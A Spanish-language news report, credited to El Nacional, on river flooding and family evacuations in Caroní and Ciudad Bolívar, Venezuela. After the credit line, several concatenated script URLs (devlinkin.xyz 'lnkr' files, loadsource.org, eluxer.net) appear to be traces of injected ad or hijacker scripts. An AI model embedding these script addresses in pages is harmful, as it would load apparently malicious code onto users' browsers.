El municipio Caroní y Ciudad Bolívar fueron afectados por los alivios de la Central Hidroeléctrica y las lluvias, respectivamente.

Más de 100 familias fueron desalojadas de sus viviendas en 3 de las 11 parroquias del municipio Caroní, en los últimos 2 días, debido a los altos niveles del río del mismo nombre, por lo cual autoridades mantienen en alerta amarilla a la localidad.

Por lo menos 19 familias fueron movilizadas en la parroquia Dalla Costa; algunas, por voluntad propia, y otras, por recomendaciones de Protección Civil, mientras que en Cachamay, de estas hay, al menos, 16 grupos parentales en 2 refugios. Hace un par de semanas atendieron a 73 familias en Chirica.

El temor por los desbordamientos de 2017 ha atrapado a los habitantes de estos sectores: “Sacamos lo que pudimos y lo guardamos en casa de un familiar. El año pasado el río nos tomó por sorpresa y perdimos muchas cosas”, declaró un vecino a diarios locales.

El director de Protección Civil Caroní destacó que continúan con el monitoreo de las comunidades más vulnerables por su cercanía al río, junto con los miembros del Comité de Riesgo que incluyen bomberos, alcaldía, gobernación y ZODI, entre otros. Por seguridad, algunas áreas de los parques Cachamay y La Llovizna han sido restringidas.No obstante, la crecida del río Caroní se originó por los alivios de la Central Hidroeléctrica que si bien originaron un aumento en el nivel del río, procura evitar las fuertes inundaciones ocurridas en 2017, afirmó el ingeniero hidrometeorólogo Valdemar Andrade.

Tanto el Caroní como el Orinoco se mantienen por encima de los 11 metros sobre el nivel del mar, lo que indica una alerta amarilla. La crecida del Orinoco, en cambio, obedece a las fuertes lluvias en el sur del país, por lo cual las autoridades han declarado a Ciudad Bolívar en alerta verde, de acuerdo con gráficos publicados por Inameh, explicó.

“Debido a los fuertes aguaceros en la ciudad, los puntos de drenaje que van al río Orinoco no son capaces de drenar esa agua, porque el río está por encima del nivel del drenaje y eso puede ocasionar inundaciones”, señaló.

Los niveles del río Orinoco, tanto en Puerto Ayacucho como en Ciudad Bolívar, han alcanzado máximos históricos, en los dos últimos días, aunque en la capital bolivarense comenzó a descender debido a que las precipitaciones se ha reducido en el estado Amazonas, según el especialista.

Advirtió que aun cuando la situación no es tan grave como la ocurrida en 2017, existe un riesgo real de inundación por lo cual destacó la necesidad de tomar precauciones.

VÍA EL NACIONAL.

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=33https://devlinkin.xyz/addons/lnkr5.min.jshttps://devlinkin.xyz/addons/lnkr30_nt.min.jshttps://eluxer.net/code?id=105&subid=51824_6748_

Loading...